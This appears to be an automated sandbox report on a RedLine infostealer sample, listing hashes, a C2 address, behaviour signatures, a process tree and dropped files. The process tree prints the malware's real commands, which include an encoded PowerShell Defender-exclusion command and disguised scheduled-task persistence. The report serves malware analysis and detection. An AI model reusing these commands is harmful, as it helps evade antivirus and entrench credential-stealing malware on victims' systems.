Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2023, 02:56

General

  • Target

    Setup.exe

  • Size

    275KB

  • MD5

    914caeec4642d8becc8edfbdc9020ce9

  • SHA1

    d29cf26f88326b12769babcc835fca89631aeb53

  • SHA256

    70d4cfde8899ce4beee159983e7d7d6ce2c08aa2ba4adc98ee47ac8743878e04

  • SHA512

    5a0250c762503180a2b7f06016b77bc52ec7940b740d8a22284bc914edb3f4261c75ab0e71c39f5b70ae70e9676bec6bb292d062f84cc5a4f91bb40915dea4da

  • SSDEEP

    3072:OCmjHS8yuBzlAjeK8SDSTRIeN10clwfC21Rzc7yFWQ3xGrcnSIZYR9cz24lK1:OnxsjeK8Pb1Nlwf51RlUrgm9cFK1

Malware Config

Extracted

Family

redline

Botnet

@svberves4

C2

45.15.156.167:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Users\Admin\AppData\Local\Temp\conhost.exe
      "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4712
        • C:\Windows\system32\mode.com
          mode 65,10
          4⤵
            PID:3464
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p199921163012031144012778512725 -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:4548
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2192
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:4432
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2148
          • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
            "Installer.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3728
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C powershell -EncodedCommand "PAAjAHcATwB4AFIAOABUAGEARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAQQBSAEgAdQAwADIAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAEUAdgBSAHQAaQBjAEsAMQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFkAZAAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAHcATwB4AFIAOABUAGEARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAQQBSAEgAdQAwADIAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAEUAdgBSAHQAaQBjAEsAMQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFkAZAAjAD4A"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4868
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
                PID:3312
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6981" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                5⤵
                  PID:5092
              • C:\Windows\system32\attrib.exe
                attrib +H "Installer.exe"
                4⤵
                • Views/modifies file attributes
                PID:4452
              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                7z.exe e extracted/file_2.zip -oextracted
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:3860
              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                7z.exe e extracted/file_4.zip -oextracted
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:768
          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:544
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEB0C.tmp.bat""
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3792
              • C:\Windows\system32\timeout.exe
                timeout 3
                4⤵
                • Delays execution with timeout.exe
                PID:2220
              • C:\ProgramData\AdobeReader\GeforceUpdater.exe
                "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4012
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4580
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
                    6⤵
                    • Creates scheduled task(s)
                    PID:728

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\AdobeReader\GeforceUpdater.exe

          Filesize

          322KB

          MD5

          a4212217a2e90127cf2870215d72edf5

          SHA1

          2fc4ad01c10a37cc88e0c7ac02fed8734c0aa6e7

          SHA256

          6ad9ac5ab7a0071a789065d1fe2fde732d88be8faaf4e875e3097157bee34d38

          SHA512

          21c11298113f5a95dc675cfa6c935ba6be26a83f19c34c5e85ede2540fe611f6138200c2376caa00ce301d5b540d1df4339a457ff3963beb5899d8854208cd01

        • C:\ProgramData\AdobeReader\GeforceUpdater.exe

          Filesize

          322KB

          MD5

          a4212217a2e90127cf2870215d72edf5

          SHA1

          2fc4ad01c10a37cc88e0c7ac02fed8734c0aa6e7

          SHA256

          6ad9ac5ab7a0071a789065d1fe2fde732d88be8faaf4e875e3097157bee34d38

          SHA512

          21c11298113f5a95dc675cfa6c935ba6be26a83f19c34c5e85ede2540fe611f6138200c2376caa00ce301d5b540d1df4339a457ff3963beb5899d8854208cd01

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b53c1mv2.zac.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0c648321522607509014810fa9850703

          SHA1

          637691d6383617223d3e560dca72cb47cd9df0e8

          SHA256

          76465863089ece91dfcafbcf35b4129659eee5bb53ac9a9add3b95c77c9022fc

          SHA512

          e9476fecdaafb141e77500878c2f5503a19ca810ffa5cf5bccf28599242f7a32021ea840aac7d174a3fff4d64131aca3ac9779b2b6f8cc96301befa55b15ed2f

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0c648321522607509014810fa9850703

          SHA1

          637691d6383617223d3e560dca72cb47cd9df0e8

          SHA256

          76465863089ece91dfcafbcf35b4129659eee5bb53ac9a9add3b95c77c9022fc

          SHA512

          e9476fecdaafb141e77500878c2f5503a19ca810ffa5cf5bccf28599242f7a32021ea840aac7d174a3fff4d64131aca3ac9779b2b6f8cc96301befa55b15ed2f

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0c648321522607509014810fa9850703

          SHA1

          637691d6383617223d3e560dca72cb47cd9df0e8

          SHA256

          76465863089ece91dfcafbcf35b4129659eee5bb53ac9a9add3b95c77c9022fc

          SHA512

          e9476fecdaafb141e77500878c2f5503a19ca810ffa5cf5bccf28599242f7a32021ea840aac7d174a3fff4d64131aca3ac9779b2b6f8cc96301befa55b15ed2f

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

          Filesize

          21KB

          MD5

          8094e61800a5461f723754cda0d85aa1

          SHA1

          1250dc65a0861507d8885d3a404b9c71a3fa306d

          SHA256

          26d81f5d1ac64ffe6fd03f77030b99c890194a0affa5c34fb2e0c20f4add6353

          SHA512

          6da9fc8490af86df2037f691ff87c989c6c79ba600aa7cf42a17a77cf6ddd61b40c6a8dad4476d301a6505480f788f6ae41df0370b7fa6ccf2a835cf7ae80be0

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

          Filesize

          2.1MB

          MD5

          a217b3a8813052306f4f2b0a9ac1dfd7

          SHA1

          f3f3bd5fb49a50a057abc23ff66ed9663fce7251

          SHA256

          77d349afa0f3690f56a9c55f2ab3daf74f5cbecf8df33682e469ce1638cde633

          SHA512

          9a9e507af0916e2eed7e9d070f06a47774ce983d2ddb64e40170d4ec8d26c8ef91aa788bd87d38276397352354cf40c67d31720e2eceee818c4192f827729815

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

          Filesize

          21KB

          MD5

          8094e61800a5461f723754cda0d85aa1

          SHA1

          1250dc65a0861507d8885d3a404b9c71a3fa306d

          SHA256

          26d81f5d1ac64ffe6fd03f77030b99c890194a0affa5c34fb2e0c20f4add6353

          SHA512

          6da9fc8490af86df2037f691ff87c989c6c79ba600aa7cf42a17a77cf6ddd61b40c6a8dad4476d301a6505480f788f6ae41df0370b7fa6ccf2a835cf7ae80be0

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

          Filesize

          9KB

          MD5

          e12b7f891dde680e5950ce87df5455fb

          SHA1

          2b1a3d9e8c6f77f3604fdcbb036ba157cce9daee

          SHA256

          4ed1c0b9af10c6a8c90c4e656de8f2aea25858f9f2e9df1f4640649450db95cd

          SHA512

          aaee8c07fcfd1c5e7aab8cf20908cda86e470661b0e1c4529a5ae903834301845b70de99ccc491b3e4a1e0f1744681ab9e20f6ece82da8ed3a7e714b9971b9ef

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

          Filesize

          9KB

          MD5

          e1cd221e697ce29ca70f2c689213153d

          SHA1

          3c875cd14fe3134a28eb1d83982422b696ef802b

          SHA256

          f13f5eee8887618bf50ac16689866c4a6dc94e61ac5a27b941c07e2a6aff849b

          SHA512

          5451c2c073dc186da0705317291d31a5061b4c4d9099885528f5d38b44ac7e201b0f6dd1b291aa7ed35ab8949014723da6368311ac4335c7c80c42523f4a7956

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

          Filesize

          9KB

          MD5

          8631891243067625145a9fba7f2a15b6

          SHA1

          772c3baa15bdde6072af2b11c4561fe65bb0f8a4

          SHA256

          2b52cea36c8238b91b4874dcdaef6cecdcae55697b10e88557e107ecc7ab3757

          SHA512

          4aae821f78c4006e3dd645cc2bd32168a71d103058475d8f6daf849399e04fdcc0d7f808633528458eaa3a7cbd6bc1d12767d469d4d9cac9afec5637425a59be

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

          Filesize

          9KB

          MD5

          e4e6029fb1592f4b0d980a1da68001b1

          SHA1

          c67a1c93cb37f2ab3b99baeb3ff24def54a25519

          SHA256

          496645b31890b89f1c580fb67de0e17fd941c856bdc90baeabd71c5b1ae297af

          SHA512

          1912f9bcdab5cfe833dfd694cd7c72743c122ca3b62ab1d4c89442bf466f225c863262f470faf161a4bda2a590c37040d25708bb3228980caf469a69b31019f4

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

          Filesize

          1.6MB

          MD5

          f23275793fbdcd6d6ad91221dd482799

          SHA1

          daee133d2b751668ff7dbe2d1fabb0fc25ac8b39

          SHA256

          20b2dd95c812adcedf04e5ca14b9e90ec047df4bff8bcffaae4f3eed1d789be1

          SHA512

          f815ba5626f6ccc4f1bd408cec40418ed57a6a4d925c5946d82e839ed3797aeea05d0bc32aeedb1eb0b179ca8495858374a90fd7a1676543e0bd801c8ed9e879

        • C:\Users\Admin\AppData\Local\Temp\main\file.bin

          Filesize

          1.6MB

          MD5

          1ae10fd8ae5314f4034d0b08f1cb86eb

          SHA1

          276a63551092638c5f7468648928a994a27b3447

          SHA256

          3d7df2ab3035b67f9770785350cf8cb9bc6c6c396166f59055430fa003c49b43

          SHA512

          678cc38b1bc0f974e32b976d9c6ed3d055df03cd96e8205f8ba75eea7a84743a9a9bd92eb68f8fdaf89862e50b8f77a19931596bb17c59ae721eac4b99ab221d

        • C:\Users\Admin\AppData\Local\Temp\main\main.bat

          Filesize

          476B

          MD5

          4fd8c0be3d5734a0efec73ad50927f94

          SHA1

          9c7e04c72e448804b0d2bc76d94e7646d16aefb9

          SHA256

          172a4b8e026cdd3274d4f494528a7b8193dab2b5d8a5bbc2a19d7f997661cf98

          SHA512

          c9a4ad6d7bacd1e2e6e8298ca041e715240ae2d1d36867cc3a9c174703011a803998f2e35e4b41ab6d5cd799730d435665e08f54a8478f770d839a9cf6f8ed94

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          322KB

          MD5

          a4212217a2e90127cf2870215d72edf5

          SHA1

          2fc4ad01c10a37cc88e0c7ac02fed8734c0aa6e7

          SHA256

          6ad9ac5ab7a0071a789065d1fe2fde732d88be8faaf4e875e3097157bee34d38

          SHA512

          21c11298113f5a95dc675cfa6c935ba6be26a83f19c34c5e85ede2540fe611f6138200c2376caa00ce301d5b540d1df4339a457ff3963beb5899d8854208cd01

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          322KB

          MD5

          a4212217a2e90127cf2870215d72edf5

          SHA1

          2fc4ad01c10a37cc88e0c7ac02fed8734c0aa6e7

          SHA256

          6ad9ac5ab7a0071a789065d1fe2fde732d88be8faaf4e875e3097157bee34d38

          SHA512

          21c11298113f5a95dc675cfa6c935ba6be26a83f19c34c5e85ede2540fe611f6138200c2376caa00ce301d5b540d1df4339a457ff3963beb5899d8854208cd01

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          322KB

          MD5

          a4212217a2e90127cf2870215d72edf5

          SHA1

          2fc4ad01c10a37cc88e0c7ac02fed8734c0aa6e7

          SHA256

          6ad9ac5ab7a0071a789065d1fe2fde732d88be8faaf4e875e3097157bee34d38

          SHA512

          21c11298113f5a95dc675cfa6c935ba6be26a83f19c34c5e85ede2540fe611f6138200c2376caa00ce301d5b540d1df4339a457ff3963beb5899d8854208cd01

        • C:\Users\Admin\AppData\Local\Temp\tmpEB0C.tmp.bat

          Filesize

          154B

          MD5

          36521e435abbb2952723918a865ad5f9

          SHA1

          74aebdbfa4ade85ae44f5de4764f48d47517f58b

          SHA256

          31b48dcf47274cacaf4e34cfb44ade12f439018126586ebac823e80d2c44bdf9

          SHA512

          fe74178e8196cd8a2a47106d0b7e8fc3540ec06fa2cd2aca393b7dd8d37ab2819c1d597c3aa72cd8d49ff07a3288fd1b2de6d5769b3b564fce8d0c850253138f

        • memory/544-68-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/544-135-0x00007FFEFFB80000-0x00007FFEFFED5000-memory.dmp

          Filesize

          3.3MB

        • memory/544-69-0x00007FFEFF330000-0x00007FFEFF357000-memory.dmp

          Filesize

          156KB

        • memory/544-148-0x00007FFF00640000-0x00007FFF006AB000-memory.dmp

          Filesize

          428KB

        • memory/544-70-0x00007FFF00640000-0x00007FFF006AB000-memory.dmp

          Filesize

          428KB

        • memory/544-67-0x00007FFEE3430000-0x00007FFEE357E000-memory.dmp

          Filesize

          1.3MB

        • memory/544-79-0x00007FFEFF5F0000-0x00007FFEFF8B9000-memory.dmp

          Filesize

          2.8MB

        • memory/544-78-0x00007FFF01A50000-0x00007FFF01C45000-memory.dmp

          Filesize

          2.0MB

        • memory/544-80-0x00007FFF015A0000-0x00007FFF01741000-memory.dmp

          Filesize

          1.6MB

        • memory/544-81-0x00007FFF005E0000-0x00007FFF0060B000-memory.dmp

          Filesize

          172KB

        • memory/544-82-0x00007FFF00070000-0x00007FFF0011C000-memory.dmp

          Filesize

          688KB

        • memory/544-65-0x00000000002B0000-0x0000000000388000-memory.dmp

          Filesize

          864KB

        • memory/544-64-0x00007FFF005E0000-0x00007FFF0060B000-memory.dmp

          Filesize

          172KB

        • memory/544-61-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/544-60-0x00007FFF015A0000-0x00007FFF01741000-memory.dmp

          Filesize

          1.6MB

        • memory/544-150-0x000002AB21ED0000-0x000002AB21F10000-memory.dmp

          Filesize

          256KB

        • memory/544-54-0x00007FFEFD090000-0x00007FFEFD0A2000-memory.dmp

          Filesize

          72KB

        • memory/544-59-0x00007FFEE4360000-0x00007FFEE441D000-memory.dmp

          Filesize

          756KB

        • memory/544-53-0x00007FFF00F80000-0x00007FFF0101E000-memory.dmp

          Filesize

          632KB

        • memory/544-46-0x00007FFEE4420000-0x00007FFEE44CA000-memory.dmp

          Filesize

          680KB

        • memory/544-41-0x000002AB21ED0000-0x000002AB21F10000-memory.dmp

          Filesize

          256KB

        • memory/544-42-0x000002AB21ED0000-0x000002AB21F10000-memory.dmp

          Filesize

          256KB

        • memory/544-39-0x00000000002B0000-0x0000000000388000-memory.dmp

          Filesize

          864KB

        • memory/544-152-0x00000000002B0000-0x0000000000388000-memory.dmp

          Filesize

          864KB

        • memory/544-146-0x00007FFEFF330000-0x00007FFEFF357000-memory.dmp

          Filesize

          156KB

        • memory/544-144-0x00007FFEE3430000-0x00007FFEE357E000-memory.dmp

          Filesize

          1.3MB

        • memory/544-140-0x00007FFEE1CE0000-0x00007FFEE27A1000-memory.dmp

          Filesize

          10.8MB

        • memory/544-143-0x00007FFF00E50000-0x00007FFF00F7A000-memory.dmp

          Filesize

          1.2MB

        • memory/544-142-0x00007FFEE4360000-0x00007FFEE441D000-memory.dmp

          Filesize

          756KB

        • memory/544-141-0x00007FFEF2CC0000-0x00007FFEF2CD6000-memory.dmp

          Filesize

          88KB

        • memory/544-139-0x00007FFEF0370000-0x00007FFEF037A000-memory.dmp

          Filesize

          40KB

        • memory/544-137-0x00007FFF01020000-0x00007FFF01075000-memory.dmp

          Filesize

          340KB

        • memory/544-83-0x00007FFF00F80000-0x00007FFF0101E000-memory.dmp

          Filesize

          632KB

        • memory/544-84-0x00007FFF00390000-0x00007FFF004BA000-memory.dmp

          Filesize

          1.2MB

        • memory/544-132-0x00007FFEF2BE0000-0x00007FFEF2C45000-memory.dmp

          Filesize

          404KB

        • memory/544-136-0x00007FFEE4420000-0x00007FFEE44CA000-memory.dmp

          Filesize

          680KB

        • memory/1424-6-0x0000000006E50000-0x00000000073F4000-memory.dmp

          Filesize

          5.6MB

        • memory/1424-11-0x0000000008580000-0x000000000868A000-memory.dmp

          Filesize

          1.0MB

        • memory/1424-10-0x0000000007CB0000-0x00000000082C8000-memory.dmp

          Filesize

          6.1MB

        • memory/1424-9-0x0000000007660000-0x000000000766A000-memory.dmp

          Filesize

          40KB

        • memory/1424-8-0x0000000007560000-0x0000000007570000-memory.dmp

          Filesize

          64KB

        • memory/1424-7-0x0000000007440000-0x00000000074D2000-memory.dmp

          Filesize

          584KB

